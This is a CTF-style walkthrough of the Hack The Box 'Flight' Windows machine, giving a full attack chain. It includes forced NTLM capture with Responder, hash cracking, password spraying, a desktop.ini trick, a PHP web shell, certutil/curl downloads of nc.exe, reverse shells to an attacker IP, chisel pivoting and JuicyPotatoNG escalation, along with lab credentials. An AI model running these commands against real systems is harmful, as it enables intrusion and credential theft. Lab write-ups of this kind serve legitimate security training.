Hack the Box (HTB) academy machines walkthrough – flight : Flight from HackTheBox which involved Forced NTLM Authentication, gettingsvc_apache’s
hash, password spraying on the enumerated usernames will lead us toS.moon
which had write access toShared
share allowing us to upload adesktop.ini
and again performing forecd authentication to getc.bum’s
hash, this user had access to web directory through smb allowing us to upload a php file giving us command execution as svc_apache, on enumerating local ports, port 8000 was running and hosting the directory fromC:\inetpub\development
, on uploading an aspx file they returned us commands running in context ofiis appol
, a service account which hadSeImpersonate
privileged enabled which can be abused through Juicy-Potato to get system shell.
Also read : Hack This Site: Realistic Web Mission – Level 11
NMAP
#$ nmap -p- --min-rate 1000 10.10.11.187
Starting Nmap 7.92 ( https://nmap.org ) at 2022-12-13 01:46 EST
Nmap scan report for school.flight.htb (10.10.11.187)
Host is up (0.30s latency).
Not shown: 65516 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
9389/tcp open adws
49667/tcp open unknown
49673/tcp open unknown
49674/tcp open unknown
49697/tcp open unknown
49709/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 197.92 seconds
Checking the Subdomains and Subfolders:
wfuzz -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt -u "http://flight.htb/" -H "Host: FUZZ.flight.htb" --hl 154
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://flight.htb/
Total requests: 19966
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000624: 200 90 L 412 W 3996 Ch "school"
After get the subdomain isSchool
, we continue to enum the URL.
dirsearch -u http://school.flight.htb
_|. _ _ _ _ _ _|_ v0.4.3.post1
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25
Wordlist size: 11460
Output File: /home/kayiz/Desktop/HTB/Flights/reports/http_school.flight.htb/_22-12-13_01-56-16.txt
Target: http://school.flight.htb/
But i notice this envidence:
It’s maybe LFI vulnerability in this URL so we check it with../../../../etc/passwd
and got the result.
So we will check the sourcecode to make sure how the filter work right
<?php
ini_set('display_errors', 0);
error_reporting(E_ERROR | E_WARNING | E_PARSE);
if(isset($_GET['view'])){
$file=$_GET['view'];
if ((strpos(urldecode($_GET['view']),'..')!==false)||
(strpos(urldecode(strtolower($_GET['view'])),'filter')!==false)||
(strpos(urldecode($_GET['view']),'\\')!==false)||
(strpos(urldecode($_GET['view']),'htaccess')!==false)||
(strpos(urldecode($_GET['view']),'.shtml')!==false)
){
echo "<h1>Suspicious Activity Blocked!";
echo "<h3>Incident will be reported</h3>\r\n";
}else{
echo file_get_contents($_GET['view']);
}
}else{
echo file_get_contents("C:\\xampp\\htdocs\\school.flight.htb\\home.html");
}
?>
Humh it’s maybe so hard to try to bypass this filter for exploiting this vul. => The url validation part prevents us from doing LFI. But we can use this code to force the service to fetch a remote source using Windows network share syntax: //ip>/<share> and attempt to capture the hash of a service.
#Website:
http://school.flight.htb/index.php?view=//ip-attack/test
#Attacker's machine:
responder -I tun0 -wPv
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
NBT-NS, LLMNR & MDNS Responder 3.1.3.0
To support this project:
Patreon -> https://www.patreon.com/PythonResponder
Paypal -> https://paypal.me/PythonResponder
Author: Laurent Gaffie ([email protected])
To kill this script hit CTRL-C
[+] Poisoners:
LLMNR [ON]
NBT-NS [ON]
MDNS [ON]
DNS [ON]
DHCP [OFF]
[+] Servers:
HTTP server [ON]
HTTPS server [ON]
WPAD proxy [ON]
Auth proxy [ON]
SMB server [ON]
Kerberos server [ON]
SQL server [ON]
FTP server [ON]
IMAP server [ON]
POP3 server [ON]
SMTP server [ON]
DNS server [ON]
LDAP server [ON]
RDP server [ON]
DCE-RPC server [ON]
WinRM server [ON]
[+] HTTP Options:
Always serving EXE [OFF]
Serving EXE [OFF]
Serving HTML [OFF]
Upstream Proxy [OFF]
[+] Poisoning Options:
Analyze Mode [OFF]
Force WPAD auth [OFF]
Force Basic Auth [OFF]
Force LM downgrade [OFF]
Force ESS downgrade [OFF]
[+] Generic Options:
Responder NIC [tun0]
Responder IP [10.10.16.13]
Responder IPv6 [dead:beef:4::100b]
Challenge set [random]
Don't Respond To Names ['ISATAP']
[+] Current Session Variables:
Responder Machine Name [WIN-UJ4VMU7XFG1]
Responder Domain Name [R924.LOCAL]
Responder DCE-RPC Port [47241]
[+] Listening for events...
[SMB] NTLMv2-SSP Client : 10.10.11.187
[SMB] NTLMv2-SSP Username : flight\svc_apache
[SMB] NTLMv2-SSP Hash : svc_apache::flight:90b54e5073440f91:DACEA051848BC07064B8F1F6CF6ECAFD:0101000000000000003EECF9970ED90152190EB7403C9CC30000000002000800520039003200340001001E00570049004E002D0055004A00340056004D0055003700580046004700310004003400570049004E002D0055004A00340056004D005500370058004600470031002E0052003900320034002E004C004F00430041004C000300140052003900320034002E004C004F00430041004C000500140052003900320034002E004C004F00430041004C0007000800003EECF9970ED90106000400020000000800300030000000000000000000000000300000E07D4392A4BC40C85784D45E08300CFC51A6ED1E43328109EE9B0274E51796EC0A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310036002E00310033000000000000000000
Crack this hash with hashcat and get the result:
hashcat -a 0 -m 5600 hash /usr/share/wordlists/rockyou.txt --show
SVC_APACHE::flight:8c0eafbdd12e31fd:e3a4c51868aef317982aabb15ce83935:010100000000000080c8475ed80dd901b5e12e7f671312270000000002000800590048003900320001001e00570049004e002d0030005200590058005800350031005800460041004b0004003400570049004e002d0030005200590058005800350031005800460041004b002e0059004800390032002e004c004f00430041004c000300140059004800390032002e004c004f00430041004c000500140059004800390032002e004c004f00430041004c000700080080c8475ed80dd901060004000200000008003000300000000000000000000000003000008e8c740a436ff819b2c69c06aef972668429b6fd779ee4577bff175870156ea60a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310036002e00310033000000000000000000
:S*******13
PORT 139/445 (SMB)
Checking null authentication on SMB shows that we can’t access any share through anonymously
After get the credssvc_apache
, we will check the folders in SMB service
smbclient -L //flight.htb/ -U svc_apache
Password for [WORKGROUP\svc_apache]:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Shared Disk
SYSVOL Disk Logon server share
Users Disk
Web Disk
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to flight.htb failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
AD Enum:
Perform enum on SMB using the previously obtained credential
> ~/tools/cme/cme OR crackmapexec smb flight.htb -u svc_apache -p 'S*********3' --users
SMB flight.htb 445 G0 flight.htb\O.Possum badpwdcount: 0 desc: Helpdesk
SMB flight.htb 445 G0 flight.htb\svc_apache badpwdcount: 0 desc: Service Apache web
SMB flight.htb 445 G0 flight.htb\V.Stevens badpwdcount: 0 desc: Secretary
SMB flight.htb 445 G0 flight.htb\D.Truff badpwdcount: 0 desc: Project Manager
SMB flight.htb 445 G0 flight.htb\I.Francis badpwdcount: 0 desc: Nobody knows why he's here
SMB flight.htb 445 G0 flight.htb\W.Walker badpwdcount: 0 desc: Payroll officer
SMB flight.htb 445 G0 flight.htb\C.Bum badpwdcount: 1 desc: Senior Web Developer
SMB flight.htb 445 G0 flight.htb\M.Gold badpwdcount: 0 desc: Sysadmin
SMB flight.htb 445 G0 flight.htb\L.Kein badpwdcount: 0 desc: Penetration tester
SMB flight.htb 445 G0 flight.htb\G.Lors badpwdcount: 0 desc: Sales manager
SMB flight.htb 445 G0 flight.htb\R.Cold badpwdcount: 0 desc: HR Assistant
SMB flight.htb 445 G0 flight.htb\S.Moon badpwdcount: 0 desc: Junio
Using a similar approach, we learnt that another users.moon
is using the same password assvc_apache
> ~/tools/cme/cme OR crackmapexec smb flight.htb -u users.txt -p 'S*********3' --continue-on-success
SMB flight.htb 445 G0 [-] flight.htb\O.Possum:S*********3 STATUS_LOGON_FAILURE
SMB flight.htb 445 G0 [+] flight.htb\svc_apache:S*********3
SMB flight.htb 445 G0 [-] flight.htb\V.Stevens:S*********3 STATUS_LOGON_FAILURE
SMB flight.htb 445 G0 [-] flight.htb\D.Truff:S*********3 STATUS_LOGON_FAILURE
SMB flight.htb 445 G0 [-] flight.htb\I.Francis:S*********3 STATUS_LOGON_FAILURE
SMB flight.htb 445 G0 [-] flight.htb\W.Walker:S*********3 STATUS_LOGON_FAILURE
SMB flight.htb 445 G0 [-] flight.htb\C.Bum:S*********3 STATUS_LOGON_FAILURE
SMB flight.htb 445 G0 [-] flight.htb\M.Gold:S*********3 STATUS_LOGON_FAILURE
SMB flight.htb 445 G0 [-] flight.htb\L.Kein:S*********3 STATUS_LOGON_FAILURE
SMB flight.htb 445 G0 [-] flight.htb\G.Lors:S*********3 STATUS_LOGON_FAILURE
SMB flight.htb 445 G0 [-] flight.htb\R.Cold:S*********3 STATUS_LOGON_FAILURE
SMB flight.htb 445 G0 [+] flight.htb\S.Moon:S*********3
User: C.bum
Using impacket-smbexec, we can find out which share is writable. But there seems to be customised code that prevents a lot of file types to be written:Shared
impacket-psexec flight.htb/[email protected]
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
Password:
[*] Requesting shares on g0.flight.htb.....
[-] share 'ADMIN$' is not writable.
[-] share 'C$' is not writable.
[-] share 'NETLOGON' is not writable.
[*] Found writable share Shared
[*] Uploading file uCHgwuyI.exe
[-] Error uploading file uCHgwuyI.exe, aborting.....
[-] Error performing the installation, cleaning up: SMB SessionError: STATUS_ACCESS_DENIED({Access Denied} A process has requested access to an object but has not been granted those access rights.)
[.ShellClassInfo]
IconResource=\\<ip>\test
After creating the file desktop.ini, we put it in the smb folder Shared:
smbclient //flight.htb/shared -U S.moon
Password for [WORKGROUP\S.moon]:
Try "help" to get a list of possible commands.
smb: \> put desktop.ini
With Attacker's machine:
responder -I tun0 -wPv
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
NBT-NS, LLMNR & MDNS Responder 3.1.3.0
To support this project:
Patreon -> https://www.patreon.com/PythonResponder
Paypal -> https://paypal.me/PythonResponder
Author: Laurent Gaffie ([email protected])
To kill this script hit CTRL-C
[+] Poisoners:
LLMNR [ON]
NBT-NS [ON]
MDNS [ON]
DNS [ON]
DHCP [OFF]
[+] Servers:
HTTP server [ON]
HTTPS server [ON]
WPAD proxy [ON]
Auth proxy [ON]
SMB server [ON]
Kerberos server [ON]
SQL server [ON]
FTP server [ON]
IMAP server [ON]
POP3 server [ON]
SMTP server [ON]
DNS server [ON]
LDAP server [ON]
RDP server [ON]
DCE-RPC server [ON]
WinRM server [ON]
[+] HTTP Options:
Always serving EXE [OFF]
Serving EXE [OFF]
Serving HTML [OFF]
Upstream Proxy [OFF]
[+] Poisoning Options:
Analyze Mode [OFF]
Force WPAD auth [OFF]
Force Basic Auth [OFF]
Force LM downgrade [OFF]
Force ESS downgrade [OFF]
[+] Generic Options:
Responder NIC [tun0]
Responder IP [10.10.16.13]
Responder IPv6 [dead:beef:4::100b]
Challenge set [random]
Don't Respond To Names ['ISATAP']
[+] Current Session Variables:
Responder Machine Name [WIN-W7Y6MWYR8I8]
Responder Domain Name [K8PD.LOCAL]
Responder DCE-RPC Port [46715]
[+] Listening for events...
[SMB] NTLMv2-SSP Client : 10.10.11.187
[SMB] NTLMv2-SSP Username : flight.htb\c.bum
[SMB] NTLMv2-SSP Hash : c.bum::flight.htb:c69dd0be9d4ce77f:00496C1DA43547AFEB8ED388C9C0DA2D:010100000000000000C6E5869D0ED901BE5A960CC06FDB0D00000000020008004B0038005000440001001E00570049004E002D0057003700590036004D0057005900520038004900380004003400570049004E002D0057003700590036004D005700590052003800490038002E004B003800500044002E004C004F00430041004C00030014004B003800500044002E004C004F00430041004C00050014004B003800500044002E004C004F00430041004C000700080000C6E5869D0ED90106000400020000000800300030000000000000000000000000300000E07D4392A4BC40C85784D45E08300CFC51A6ED1E43328109EE9B0274E51796EC0A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310036002E00310033000000000000000000
After that we use hashcat to crack c.bum password:
hashcat -a 0 -m 5600 hash_c.bum /usr/share/wordlists/rockyou.txt --show
C.BUM::flight.htb:63feab9f7229564f:2bc7d47b69023462e28e2df7dccce6e6:010100000000000080375566db0dd9010a4e5110dfd2119000000000020008004e0042004200380001001e00570049004e002d0042005400540039004a0050005a004a0042003700550004003400570049004e002d0042005400540039004a0050005a004a004200370055002e004e004200420038002e004c004f00430041004c00030014004e004200420038002e004c004f00430041004c00050014004e004200420038002e004c004f00430041004c000700080080375566db0dd901060004000200000008003000300000000000000000000000003000008e8c740a436ff819b2c69c06aef972668429b6fd779ee4577bff175870156ea60a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310036002e00310033000000000000000000
:T*************4
After get this cred, we can login into the Web folder with smb service.
smbclient //flight.htb/Web -U c.bum
Password for [WORKGROUP\c.bum]:
Try "help" to get a list of possible commands.
Then i put the p0wny-shell into the flight.htb: https://github.com/flozz/p0wny-shell
smb: \> ls
. D 0 Tue Dec 13 09:57:01 2022
.. D 0 Tue Dec 13 09:57:01 2022
flight.htb D 0 Tue Dec 13 09:57:01 2022
school.flight.htb D 0 Tue Dec 13 09:57:01 2022
5056511 blocks of size 4096. 1250756 blocks available
smb: \> cd flight.htb
smb: \flight.htb\> put web_shell.php test.php
putting file web_shell.php as \flight.htb\test.php (8.4 kb/s) (average 9.0 kb/s)
smb: \flight.htb\>
Then go to the web_shell and get the connect session with revshells.com
C.bum Session:
We got the cred of c.bum so we need to change the session connect to c.bum withRunasCS
:https://github.com/antonioCoco/RunasCs/tree/master
PS C:\Users\svc_apache\Desktop> .\test.exe c.bum Tikkycoll_431012284 powershell -r 10.10.16.13:9003
[*] Warning: Using function CreateProcessWithLogonW is not compatible with logon type 8. Reverting to logon type Interactive (2)...
[+] Running in session 0 with process function CreateProcessWithLogonW()
[+] Using Station\Desktop: Service-0x0-59b6e$\Default
[+] Async process 'powershell' with pid 2380 created and left in background.
After that we can type theuser.txt
file
P.E
After get the shell withsvc_apache
user, i will check port which is opening to serve the specified service and i got the8000
. So i pivot it with chisel to interact to it with attacker’s machine:
PS C:\xampp\htdocs\flight.htb> netstat -a
Active Connections
Proto Local Address Foreign Address State
TCP 0.0.0.0:80 g0:0 LISTENING
TCP 0.0.0.0:88 g0:0 LISTENING
TCP 0.0.0.0:135 g0:0 LISTENING
TCP 0.0.0.0:389 g0:0 LISTENING
TCP 0.0.0.0:443 g0:0 LISTENING
TCP 0.0.0.0:445 g0:0 LISTENING
TCP 0.0.0.0:464 g0:0 LISTENING
TCP 0.0.0.0:593 g0:0 LISTENING
TCP 0.0.0.0:636 g0:0 LISTENING
TCP 0.0.0.0:3268 g0:0 LISTENING
TCP 0.0.0.0:3269 g0:0 LISTENING
TCP 0.0.0.0:5985 g0:0 LISTENING
TCP 0.0.0.0:8000 g0:0 LISTENING
Pivoting Network with Chisel:
#Client:
.\chisel.exe client 10.10.16.13:9999 R:8000:127.0.0.1:8000
#Server:
chisel server --reverse -p 9999
After i got the connect with website, i realize the website is written by ASP .NET => i can try to upload the.aspx
shell to reverse this sesssion
Because the shell maybe remove very quick so we need to upload it to somewhere and we just copy it maybe it's necessary.
PS C:\users\svc_apache\Desktop> copy cmd.aspx c:\inetpub\development\
We can get the reverse shell withiis apppool\defaultapppool
Administrator
Enum:
PS C:\windows\system32\inetsrv> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeMachineAccountPrivilege Add workstations to domain Disabled
SeAuditPrivilege Generate security audits Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
After refering this posthttps://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/privilege-escalation-abusing-tokens. I decide to choose Potatojuice to Priv this machinehttps://github.com/antonioCoco/JuicyPotatoNG
i will upload 2 things into c:\users\c.bum\desktop
>certutil.exe -urlcache -f http://10.10.16.13/nc.exe nc.exe
>certutil.exe -urlcache -f http://10.10.16.13/JuicyPotatoNG.exe test.exe
After that we grant permission 2 files for everyone
>icacls nc.exe /grant Users:F
>icacls test.exe /grant Users:F
We go to theiis/appool
session to get the root
c:\users\c.bum\desktop\test.exe -t * -p "c:\users\c.bum\desktop\nc.exe" -a "10.10.16.13 9005 -e cmd.exe"
Result:
2nd Method
PORT 80 (HTTP)
The site didn’t had anything there as it was just a page with no links alsogobuster
didn’t showed anything interesting to as well
So addingflight.htb
in/etc/hosts
file as we can see the domain name at the bottom of the page
Fuzzing for subdomains usingwfuzz
wfuzz -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u 'http://flight.htb' -H "Host: FUZZ.flight.htb" --hh 7069
Adding this subdomain in hosts file and accessing the site
Checking for Local File Inclusion it filters..
if it’s in the url but allows/
Foothold (Svc_apache)
Runningwfuzz
again to fuzz for LFI payloads we find that we can just specify a file name without using..
Let’s verify if we have remote file inclusion if we do we can just try accessing a fake share on our machine and useresponder
to capture NTLMv2 hash
We have a hit so now running responder and accessing a fake share with//IP/share
responder -I tun0
http://school.flight.htb/index.php?view=//10.10.14.28/uwu
Saving this hash in a file cracking it withjohn
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
With the valid credentials we can start enumerating the shares and usernames throughcrackmapexec
Usingenum4linux
to query usernames and filtering usernames so that we can password spray on them
enum4linux-ng -A flight.htb -u 'svc_apache' -p 'S@Ss!K@*t13' | grep username | awk -F : {'print $2'} > users.txt
S.moon
Using either cme or kerbrute to perform password spary we’ll getS.Moon
having the same password
kerbrute passwordspray -d flight.htb --dc 10.10.11.187 ./users.txt 'S@Ss!K@*t13'
cme smb flight.htb -u users.txt -p 'S@Ss!K@*t13' --continue-on-success
Checking shares with s.moon, we see that we have write access on `shared`
C.bum
On uploading.scf
file extension to perform forced authentication it didn’t allowed us to upload that extension, not sure why
But on uploadingdesktop.ini
file it worked
Also read : Hack This Site: Realistic Web Mission – Level 12
[.ShellClassInfo]
IconResource=\\10.10.14.28\aa
Cracking this hash again with john
Foothold
This user has write access onweb
share which means that we can upload php file which will be reflected on schooled.flight.htb
Uploading a php file callingphpinfo()
<?php phpinfo(); ?>
Having the ability to execute commands on the system we can get a reverse shell by uploading nc.exe and executing it
http://school.flight.htb/uwu.php?cmd=curl+10.10.14.28:2222/nc64.exe -o C:\Windows\Temp\nc64.exe
http://school.flight.htb/uwu.php?cmd=C:\Windows\Temp\nc64.exe 10.10.14.28 3333 -e powershell.exe
Since we already have credentials ofc.bum
we can execute commands through that user usingRunasC.exe
.\RunasCs.exe c.bum Tikkycoll_431012284 whoami
Running netstat, we’ll see that there’s port 8000 open locally
Port forwarding port 8000 usingchisel
chisel server --reverse -p 8001
And running the client on the target machine
.\chisel.exe client 10.10.14.28:8001 R:8000:127.0.0.1:8000
Accessing the port on our browser shows that access is denied
But this shows the path where the directory is hosted,
C:\inetpub\Development
In this folder, there are few html files
Runningicacls
on the development folder shows thatc.bum
has write access
UsingRunasCs
we can switch user as c.bum and transfer aspx shell in that directory
.\RunasCs.exe c.bum Tikkycoll_431012284 'curl 10.10.14.28:2222/aspx_shell.aspx -o C:\inetpub\Development\shell.aspx'
I tried executing nc.exe to get a reverse shell but it wasn’t working for some reason so instead I generated a msfvenom payload
Transfer it and execute it
On checking privileges ofiis appol
,SeImpersonate
was enabled
To abuse this, we can useJuicyPotato-ng
to get a system shell
.\potatoe.exe -t * -p "C:\Windows\system32\cmd.exe" -a "/c C:\Windows\Temp\nc.exe 10.10.14.28 6666 -e cmd.exe"
[…] Also read : Flight – hack the box latest ctf walkthrough […]
[…] Also read : Hack the Box (HTB) academy machines walkthrough – flight […]